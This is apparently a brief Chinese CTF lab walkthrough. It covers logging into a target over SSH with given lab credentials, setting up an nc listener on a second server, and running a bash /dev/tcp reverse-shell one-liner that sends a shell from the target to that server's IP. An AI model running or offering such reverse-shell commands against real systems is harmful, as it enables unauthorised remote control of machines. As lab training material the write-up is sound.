一.远程连接靶机
xshell连接47.100.220.113,SSH端口:3322,SSH账号:ctfSSH,密码:ctf,连接上后输入/bin/bash计入命令行
二.开启另外一个服务器(阿里云),用nc监听8888端口:nc -lvnp 8888,不知道阿里云为什么用不了-lvvp
三.目标机使用Linux反弹shell命令
bash -i >& /dev/tcp/114.55.112.69/8888 0>&1 linux端(目标机器)执行命令
四.阿里云服务器根据反弹shell自动获取了目标机的权限